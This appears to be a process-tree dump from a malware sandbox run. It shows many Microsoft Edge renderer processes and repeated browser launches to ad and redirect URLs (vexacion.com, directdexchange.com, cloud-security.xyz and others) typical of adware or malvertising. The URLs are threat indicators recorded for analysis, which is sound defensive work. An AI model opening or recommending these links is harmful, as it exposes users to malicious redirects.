C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11016 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11924 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11892 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12480 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12196 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12800 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12784 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=12660 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12348 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11852 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9948 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12852 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12508 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11752 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13000 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12684 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12540 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12624 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10292 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13180 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13052 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13116 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13200 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8364 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13048 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13552 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12644 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12464 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13108 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13536 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13868 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13892 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13216 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=155 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13600 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=156 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13128 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13068 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13480 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13780 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵
-
